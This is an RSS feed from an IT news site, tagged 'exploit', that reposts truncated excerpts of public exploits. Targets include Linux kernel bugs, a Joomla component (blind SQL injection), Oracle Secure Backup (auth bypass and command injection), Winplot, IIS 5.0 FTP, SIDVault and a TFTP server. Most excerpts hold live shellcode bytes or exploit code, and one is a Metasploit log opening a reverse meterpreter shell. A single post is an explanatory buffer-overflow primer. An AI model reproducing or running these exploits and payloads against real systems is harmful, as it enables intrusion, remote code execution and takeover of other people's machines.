<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; exploit</title>
	<atom:link href="http://www.goitworld.com/tag/exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Linux binfmt_elf core dump buffer overflow</title>
		<link>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/</link>
		<comments>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/#comments</comments>
		<pubDate>Mon, 19 Sep 2011 13:45:40 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[kernel-2.2.27]]></category>
		<category><![CDATA[binfmt_elf]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[core dump]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>/*   <br />* Linux binfmt_elf core dump buffer overflow    <br />*    <br />* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.    <br />*    <br />* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED &#34;AS IS&#34;    <br />* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION    <br />* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.    <br />*    <br />*/    <br />// phase 1    <br />#include &#60;stdio.h&#62;    <br />#include &#60;stdlib.h&#62;    <br />#include &#60;errno.h&#62;    <br />#include &#60;unistd.h&#62;</p>
<p>#include &#60;sys/time.h&#62;   <br />#include &#60;sys/resource.h&#62;</p>
<p>#include &#60;asm/page.h&#62;</p>
<p>static char *env[10], *argv[4];    <br />static char page[PAGE_SIZE];    <br />static char&#8230; <a href="http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Buffer Overflows exploit</title>
		<link>http://www.goitworld.com/buffer-overflows-exploit/</link>
		<comments>http://www.goitworld.com/buffer-overflows-exploit/#comments</comments>
		<pubDate>Mon, 06 Dec 2010 07:04:37 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/buffer-overflows-exploit/</guid>
		<description><![CDATA[<p><a name="Buffer overflow"></a>Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet <a name="idx-CHP-3-0595"></a><a name="buffer overflow"></a>worms use buffer overflow vulnerabilities to propagate, and even the most recent <a name="idx-CHP-3-0596"></a><a name="vulnerability in"></a>zero-day VML vulnerability in <a name="idx-CHP-3-0597"></a>Internet Explorer is due to a buffer overflow.</p>
<p>C is a high-level programming language, but it assumes that the <a name="idx-CHP-3-0598"></a>programmer is responsible <a name="idx-CHP-3-0599"></a>for <a name="idx-CHP-3-0600"></a><a name="the resulting"></a>data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer&#8230; <a href="http://www.goitworld.com/buffer-overflows-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/buffer-overflows-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Joomla com_mytube (user_id) Blind SQL Injection Exploit</title>
		<link>http://www.goitworld.com/joomla-com_mytube-user_id-blind-sql-injection-exploit/</link>
		<comments>http://www.goitworld.com/joomla-com_mytube-user_id-blind-sql-injection-exploit/#comments</comments>
		<pubDate>Thu, 15 Oct 2009 12:19:29 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[blind]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/joomla-com_mytube-user_id-blind-sql-injection-exploit/</guid>
		<description><![CDATA[<p>#!/usr/bin/perl -w </p>
<p>#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;   <br />#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability    <br />#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; </p>
<p>#Author&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : Chip D3 Bi0s   <br />#Group&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : LatiHackTeam    <br />#Email&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : chipdebios[alt+64]gmail.com    <br />#Date&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : 15 September 2009    <br />#Critical Lvl&#160;&#160; : Moderate    <br />#Impact&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : Exposure of sensitive information    <br />#Where&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : From Remote    <br />#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; </p>
<p>#Affected software description:   <br />#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ </p>
<p>#Application&#160;&#160; : MyRemote Video Gallery   <br />#version&#160;&#160;&#160;&#160;&#160;&#160; : 1.0 Beta     <br />#Developer&#160;&#160;&#160;&#160; : Jomtube Team    <br />#License&#160;&#160;&#160;&#160;&#160;&#160; : GPL&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; type&#160; : Non-Commercial    <br />#Date Added&#160;&#160;&#160; : Aug 24, 2009    <br />#Download&#160;&#160;&#160;&#160;&#160; : <a href="http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip">http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip</a>    <br />#Description&#160;&#160; : </p>
<p>#MyRemote&#8230; <a href="http://www.goitworld.com/joomla-com_mytube-user_id-blind-sql-injection-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/joomla-com_mytube-user_id-blind-sql-injection-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit</title>
		<link>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/</link>
		<comments>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 12:52:58 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[secure]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/</guid>
		<description><![CDATA[<p>#!/bin/bash </p>
<p>#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability   <br />#1-day exploit for CVE-2009-1977 and CVE-2009-1978 </p>
<p>#PoC script successfully tested on:   <br />#Oracle Secure Backup Server 10.3.0.1.0_win32_release    <br />#MS Windows Professional XP SP3 </p>
<p>#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.   <br />#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart     <br />#authentication bypass and a trivial command injection, resulting in arbitrary command execution. </p>
<p>#References:   <br />#<a href="http://www.zerodayinitiative.com/advisories/ZDI-09-058/">http://www.zerodayinitiative.com/advisories/ZDI-09-058/</a>    <br />#<a href="http://www.zerodayinitiative.com/advisories/ZDI-09-059/">http://www.zerodayinitiative.com/advisories/ZDI-09-059/</a>&#8230; <a href="http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/oracle-secure-backup-server-10-3-0-1-0-auth-bypassrci-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Winplot (.wp2 File) Local Buffer Overflow Exploit</title>
		<link>http://www.goitworld.com/winplot-wp2-file-local-buffer-overflow-exploit/</link>
		<comments>http://www.goitworld.com/winplot-wp2-file-local-buffer-overflow-exploit/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 12:43:13 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[overflow]]></category>
		<category><![CDATA[winplot]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/winplot-wp2-file-local-buffer-overflow-exploit/</guid>
		<description><![CDATA[<p># Author: Rick   <br /># Email: rick2600@hotmail.com    <br />#     <br /># Software: <a href="http://math.exeter.edu/rparris/peanut/wp32z.exe">http://math.exeter.edu/rparris/peanut/wp32z.exe</a>    <br /># Version: Compiled in 19 sept 2009    <br />#    <br /># Exec: calc.exe    <br /># Tested on: Windows XP SP2 EN,PT-BR, Vista    <br /># Greeting: Hisok4, All my friends </p>
<p>$header1 =   <br />&#34;\x49\x03\x00\x00\x19\x00\x00\x00\x30\x00\x00\x00\x2e\x00\x00\x00&#34;.    <br />&#34;\x0e\x02\x00\x00\x0e\x02\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00&#34;.    <br />&#34;\x3d\x00\x00\x00\xd9\xff\xff\xff\x2c\x01\x00\x00\x64\x00\x00\x00&#34;.    <br />&#34;\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00&#34;.    <br />&#34;\x0f\x00\x00\x00\x2b\xd0\x28\x01\x49\x1e\x29\x01\x00\x00\x00\x00&#34;.    <br />&#34;\x0c\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x08\x00\x00\x00&#34;.    <br />&#34;\x0c\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00&#34;.    <br />&#34;\x0a\x00\x00\x00\x0a\x00\x00\x00\xf0\xff\xff\xff\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x02\x08\x02\x01\x31&#34;.    <br />&#34;\x53\x79\x6d\x62\x6f\x6c\x00\x20\x4e\x65\x77\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x90\x01\x00\x00\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72&#34;.    <br />&#34;\x69\x65\x72\x20\x4e\x65\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf5\xff\xff\xff&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20&#34;.    <br />&#34;\x4e\x65\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xff\xff\xff\x00\x00\x00\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00&#34;.    <br />&#34;\x08\x02\x01\x02\x54\x69\x6d\x65\x73\x00\x72\x20\x4e\x65\x77\x00&#34;.    <br />&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;.    <br&#8230; <a href="http://www.goitworld.com/winplot-wp2-file-local-buffer-overflow-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/winplot-wp2-file-local-buffer-overflow-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)</title>
		<link>http://www.goitworld.com/microsoft-iis-5-0-ftp-server-remote-stack-overflow-exploit-win2k-sp4/</link>
		<comments>http://www.goitworld.com/microsoft-iis-5-0-ftp-server-remote-stack-overflow-exploit-win2k-sp4/#comments</comments>
		<pubDate>Tue, 08 Sep 2009 01:25:29 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[ftp server]]></category>
		<category><![CDATA[microsoft iis5]]></category>
		<category><![CDATA[overflow]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-iis-5-0-ftp-server-remote-stack-overflow-exploit-win2k-sp4/</guid>
		<description><![CDATA[<p># IIS 5.0 FTPd / Remote r00t exploit    <br /># Win2k SP4 targets     <br /># bug found &#38; exploited by Kingcope, kcope2&#60;at&#62;googlemail.com     <br /># Affects IIS6 with stack cookie protection     <br /># August 2009 &#8211; KEEP THIS 0DAY PRIV8     <br />use IO::Socket;     <br />$&#124;=1;     <br />#metasploit shellcode, adduser &#34;winown:nwoniw&#34;     <br />$sc = &#34;\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49&#34; .     <br />&#34;\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51&#34; .     <br />&#34;\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32&#34; .     <br />&#34;\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41&#34; .     <br />&#34;\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30&#34; .     <br />&#34;\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55&#34; .     <br />&#34;\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b&#34; .     <br />&#34;\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44&#34; .     <br />&#34;\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c&#34; .     <br />&#34;\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d&#34; .     <br />&#34;\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44&#34; .     <br />&#34;\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31&#34; .     <br />&#34;\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f&#34; .     <br />&#34;\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51&#34; .     <br />&#34;\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f&#34; .     <br />&#34;\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46&#34; .     <br&#8230; <a href="http://www.goitworld.com/microsoft-iis-5-0-ftp-server-remote-stack-overflow-exploit-win2k-sp4/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-iis-5-0-ftp-server-remote-stack-overflow-exploit-win2k-sp4/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta)</title>
		<link>http://www.goitworld.com/sidvault-2-0e-windows-remote-buffer-overflow-exploit-meta/</link>
		<comments>http://www.goitworld.com/sidvault-2-0e-windows-remote-buffer-overflow-exploit-meta/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 00:43:26 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[remote buffer overflow]]></category>
		<category><![CDATA[sidvault]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/sidvault-2-0e-windows-remote-buffer-overflow-exploit-meta/</guid>
		<description><![CDATA[<p>#&#8211;attack-log&#8211;   <br />#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$     <br />./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E    <br />#[*] Please wait while we load the module tree&#8230;    <br />#[*] Handler binding to LHOST 0.0.0.0    <br />#[*] Started reverse handler    <br />#[*] Sending stage (718336 bytes)    <br />#[*] Meterpreter session 1 opened (192.168.1.2:4444 -&#62; 192.168.1.3:1076) </p>
<p>#meterpreter &#62; </p>
<p>##   <br /># This file is part of the Metasploit Framework and may be subject to     <br /># redistribution and commercial restrictions. Please see the Metasploit    <br /># Framework web site for more information on licensing and terms of use.    <br /># <a href="http://metasploit.com/framework/">http://metasploit.com/framework/</a>    <br />## </p>
<p>require &#8216;msf/core&#8217;&#8230; <a href="http://www.goitworld.com/sidvault-2-0e-windows-remote-buffer-overflow-exploit-meta/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/sidvault-2-0e-windows-remote-buffer-overflow-exploit-meta/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit</title>
		<link>http://www.goitworld.com/prosysinfo-tftp-server-tftpdwin-0-4-2-remote-bof-exploit/</link>
		<comments>http://www.goitworld.com/prosysinfo-tftp-server-tftpdwin-0-4-2-remote-bof-exploit/#comments</comments>
		<pubDate>Sun, 23 Aug 2009 10:37:22 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[prosysinfo]]></category>
		<category><![CDATA[remote bof]]></category>
		<category><![CDATA[tftp]]></category>
		<category><![CDATA[tftpdwin]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/prosysinfo-tftp-server-tftpdwin-0-4-2-remote-bof-exploit/</guid>
		<description><![CDATA[<p>#!/usr/bin/python </p>
<p>#ProSysInfo TFTP Server TFTPDWIN 0.4.2   <br />#Coded by Wraith </p>
<p>import os   <br />import sys    <br />import struct    <br />import socket    <br />import time </p>
<p>print &#34;\nProSysInfo TFTP Server TFTPDWIN 0.4.2&#34;   <br />print &#34;Note: This vuln is sensitive to different buffer length\n&#34;    <br />if len(sys.argv)!=2:    <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160; print &#34;Usage: tftpdwin.py &#60;ip&#62;&#34;    <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160; sys.exit(0) </p>
<p>buffer = &#34;\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&#34;   <br />buffer += &#34;\x8b\xc3\x66\x05\x12\x01\x50\xc3&#34; + &#34;\x90&#34;*57 </p>
<p>buffer += &#34;\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64&#34;   <br />buffer += &#34;\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C&#34;    <br />buffer += &#34;\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77&#34;    <br />buffer += &#34;\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60&#34;    <br />buffer += &#34;\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF&#34;    <br />buffer += &#34;\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7&#34;    <br />buffer += &#34;\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B&#34;    <br />buffer += &#34;\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4&#34;    <br />buffer&#8230; <a href="http://www.goitworld.com/prosysinfo-tftp-server-tftpdwin-0-4-2-remote-bof-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/prosysinfo-tftp-server-tftpdwin-0-4-2-remote-bof-exploit/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit</title>
		<link>http://www.goitworld.com/linux-kernel-2-x-sock_sendpage-local-ring0-root-exploit/</link>
		<comments>http://www.goitworld.com/linux-kernel-2-x-sock_sendpage-local-ring0-root-exploit/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 12:46:00 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[local ring0]]></category>
		<category><![CDATA[root]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/linux-kernel-2-x-sock_sendpage-local-ring0-root-exploit/</guid>
		<description><![CDATA[<p>/* dedicated to my best friend in the whole world, Robin Price   <br />&#160;&#160; the joke is in your hands </p>
<p>&#160;&#160; just too easy &#8212; some nice library functions for reuse here though </p>
<p>&#160;&#160; credits to julien tinnes/tavis ormandy for the bug </p>
<p>&#160;&#160; may want to remove the __attribute__((regparm(3))) for 2.4 kernels,   <br />&#160;&#160; I have no time to test </p>
<p>spender@www:~$ cat redhat_hehe   <br />I bet Red Hat will wish they closed the SELinux vulnerability when they    <br />were given the opportunity to.&#160; Now all RHEL boxes will get owned by    <br />leeches.c :p </p>
<p>fd7810e34e9856f77cba67f291ba115f33411ebd&#8230; <a href="http://www.goitworld.com/linux-kernel-2-x-sock_sendpage-local-ring0-root-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/linux-kernel-2-x-sock_sendpage-local-ring0-root-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit</title>
		<link>http://www.goitworld.com/ftpshell-client-4-1-rc2-name-session-stack-overflow-exploit/</link>
		<comments>http://www.goitworld.com/ftpshell-client-4-1-rc2-name-session-stack-overflow-exploit/#comments</comments>
		<pubDate>Fri, 14 Aug 2009 08:28:06 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[ftpshell]]></category>
		<category><![CDATA[overflow]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/ftpshell-client-4-1-rc2-name-session-stack-overflow-exploit/</guid>
		<description><![CDATA[<p>/*   <br /> * FTPShell Client, Name Session Stack Overflow Exploit    <br /> * Tested on Version 4.1 RC2 on Windows XP SP3    <br /> * Vulnerable program download page : <a href="http://www.ftpshell.com/downloadclient.htm">http://www.ftpshell.com/downloadclient.htm</a>    <br /> * Coded by zec    <br /> * Feel yourself freely to get into touch : zec@bsdmail.com    <br /> */ </p>
<p>package ftpbof;   <br />import java.io.DataOutputStream;    <br />import java.io.FileNotFoundException;    <br />import java.io.FileOutputStream;    <br />import java.io.IOException;    <br />/**    <br /> * @author zec    <br /> */    <br />public class Main {    <br />&#160;&#160;&#160; public static void main(String[] args) throws IOException&#160; {    <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160; /*&#160; Shellcode calc.exe    <br&#8230; <a href="http://www.goitworld.com/ftpshell-client-4-1-rc2-name-session-stack-overflow-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/ftpshell-client-4-1-rc2-name-session-stack-overflow-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

